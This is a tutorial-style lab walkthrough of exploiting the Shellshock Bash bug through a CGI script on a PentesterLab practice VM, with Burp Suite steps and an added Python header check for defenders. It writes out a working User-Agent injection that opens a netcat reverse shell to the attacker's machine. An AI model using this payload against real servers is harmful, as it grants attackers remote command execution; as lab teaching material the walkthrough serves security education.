Shellshock Exploitation by Fallen Angell


Hello guys, it is time that we cover our first vulnerability in a website. As a first vulnerability, I’ve chosen to show you Shellshock exploitation.

Bash is a Unix shell written for the GNU Project as a free software replacement for the Bourne shell. It is often installed as the system’s default command-line interface and it provides end users an interface to issue system commands and execute scripts.

Shellshock is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many Internet-facing services, such as web servers, that use Bash to process requests. Bash is not usually available through a web application but can be indirectly exposed through a Common Gateway Interface “CGI”.

You will most likely never find it today while performing penetration tests. Nonetheless, I want to show it to you because of the impact that it had. Shellshock is considered one of the most critical and serious vulnerabilities ever discovered. The vulnerability stems from the way Bash processes environment variables. Many things were hit by it, from DHCP clients and terminal command lines to CGI scripts inside web applications. In this tutorial we will see an example of exploiting ShellShock through a CGI script on a web page.

For this we are going to download a small ISO file that lets us run a virtual machine built only for this vulnerability. Don’t worry, it only takes a few seconds to install because it is a small virtual machine purposely designed for this specific vulnerability. To download it, go to Google and type in pentesterlab shellshock; you should see a link that says CVE-2014-6271, called ShellShock. It is from pentesterlab.com. Click on it and it will take you to a page with the ShellShock introduction, fingerprinting and all the other material regarding this vulnerability.

However, we’re not going to go into these details because we want to exploit it ourselves. Instead, go to Files, where you should see the ISO. Click on it and it will download the ISO image, which is 19.1 megabytes in size. So you can see it is really, really small.

Once you do that, go to VirtualBox and create a virtual machine as we usually do.

In VirtualBox click on New, then call the machine anything you want, for example shellshock. Import your downloaded cve-2014-6271.iso file. Then select Linux as the operating system; the version of Linux is going to be Other Linux 32 bit.

In the Hardware part you can leave it at 256 megabytes of RAM and 1 CPU. That is more than enough for this machine.

Select Create a Virtual Hard Disk Now and make the size 8 GB, which is more than enough. Then press Enter or click Create.

There are two more things that we want to do once we create the new virtual machine. Navigate to the Settings. From the Settings, go to Network, switch from NAT to Bridged Adapter and select your adapter.

After you do that, you want to go to your Kali Linux.

Start your Burp Suite tool, and as soon as it opens up we’ll be able to visit the page on our ShellShock virtual machine. If you’re starting the virtual machine for the first time, it should only take a few seconds to set everything up since it is a really, really small virtual machine. Once it boots, it won’t even prompt you for a login. There is no login on this machine.

It will just drop to the command line, where we type ifconfig to find out the IP address of this machine. In my case, it is 192.168.10.14.

So all we want to do is we want to go to our Firefox from Kali Linux and visit this page to see what we have.

This seems to be the entire page of this virtual machine: we see that the system is running, how long it has been running (currently 8 minutes, because we just started it up) and the kernel of the virtual machine.

Now if we take a look at Burp Suite, go to Target and open the IP address of the ShellShock virtual machine, we will see all the links that were requested while loading the web page of our ShellShock virtual machine.

We will see the / directory and the cgi-bin status entry, so we have a CGI script here. To see the response to that request, simply select the request and click on Response.

Down here we will see output that looks a lot like the output of the command uname -a.

For example, if you run the command uname -a inside your terminal, it’ll give you output like this, which tells you which version of Linux you are running and so on.

We get similar output inside Burp Suite, as we can see here. In most cases, this output is produced by the uname -a command, and it is run by bash.

The User-Agent field in the request that we made becomes an environment variable when it is processed by this CGI script.

So what we can try is to inject a command into that field. However, it is not that easy. We can’t just put, for example, the whoami command there instead of the user agent. It will not give us any output back.

You might be asking why?

Well, because the ShellShock vulnerability is based on first specifying an empty function. I know this might sound confusing, but just stick with me for a couple more minutes and I will explain how it works.

The vulnerability itself was discovered when the syntax for an empty function was specified inside an environment variable such as this user agent. The empty function syntax looks like this:

() { :;};

This is the syntax for an empty function. Any command that we want to run must be preceded by this empty function syntax.

Why?

Well, when a vulnerable bash starts up and finds an environment variable whose value begins with this function syntax, it imports the value as a function definition. Instead of stopping at the end of the function body, it keeps going and runs whatever comes after it as a command on the server, and that is the entire vulnerability.
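The two points above, that a request header reaches the CGI script as an environment variable and that a value starting with the function syntax is what triggers the bug, can be turned into a request check on the defending side. This is an added example, not part of the original article; the function names and the sample requests are constructed for illustration.

```python
import re

# A vulnerable Bash treated an environment value beginning with "() {" as a
# function definition to import; this pattern also tolerates extra whitespace.
FUNC_DEF_PREFIX = re.compile(r"^\s*\(\)\s*\{")

# Headers that CGI exposes without the HTTP_ prefix (RFC 3875).
UNPREFIXED = {"content-type": "CONTENT_TYPE", "content-length": "CONTENT_LENGTH"}


def cgi_env_from_headers(headers):
    """Map request headers to the variable names a CGI script would see."""
    env = {}
    for name, value in headers.items():
        key = UNPREFIXED.get(name.lower())
        if key is None:
            key = "HTTP_" + name.upper().replace("-", "_")
        env[key] = value
    return env


def function_like_vars(env):
    """Return names of variables whose value starts like a Bash function."""
    return sorted(k for k, v in env.items() if FUNC_DEF_PREFIX.match(v))


def inspect_request(headers):
    """Verdict for one request: ("block", [vars]) or ("allow", [])."""
    hits = function_like_vars(cgi_env_from_headers(headers))
    return ("block", hits) if hits else ("allow", [])


# Constructed sample requests (not captured traffic).
BENIGN = {"Host": "192.168.10.14", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)"}
PROBE = {
    "Host": "192.168.10.14",
    "User-Agent": "() { :;}; echo probe",
    "Referer": "()  {  _; } ; echo probe",
    "Accept": "text/html () { not at start",
}

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("probe", PROBE)):
        print(label, inspect_request(req))
```

A filter like this is a stopgap and a log-review aid; the actual fix is a patched Bash.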

All we have to do is specify a command after the syntax and it should work. To do that, we must send this HTTP request to the cgi-bin script once again, and in place of the user agent we must specify the empty function syntax and then our command.

So how can we do that? How can we send the request once again?

Well, luckily Burp Suite allows us to edit our requests and send them as many times as we want. All we need to do is to select the request that we want to send again. Then we right-click and Send to Repeater right here.

Then you will see this Repeater part light up. We want to go there and here we can edit our request before actually sending it. So we mentioned that we want to inject the command inside of the User-Agent field.

Let us remove this. And let’s type the syntax for the empty function first. Now what you can do after this is you can inject your command. And if you want to, you can test to see if it works with the ping command first.

But I’m not going to test it with the ping command.

I’m going to straight away try to establish a connection with our Kali Linux machine and get a reverse shell back.

Well, we want to execute the following command.

() { :;}; /bin/bash -c 'nc 192.168.10.24 12345 -e /bin/bash'

We want to execute /bin/bash. If we specify -c after it, it’ll tell our target that whatever we send after this will be our command, and we must specify it between single quotes.

So for now we have the empty function syntax, then /bin/bash -c, then an opening and a closing single quote. In between the quotes we type nc, which stands for Netcat, and we specify the IP address of our Kali Linux machine. I also want to specify the port to connect to. In my case I will use port 12345; it doesn’t really matter. At the end we specify -e, which stands for what we want to execute on our target machine. We simply want to use the bash shell, so we do that by specifying /bin/bash.

But before we send this request from our Burp Suite, we must set up a listener.

And now click Send.

We can see we got the connection from our ShellShock virtual machine. And if we try to execute commands all of that will work.

We did it.

My aim was to explain concepts with clarity and simplicity.

Thanks for reading!
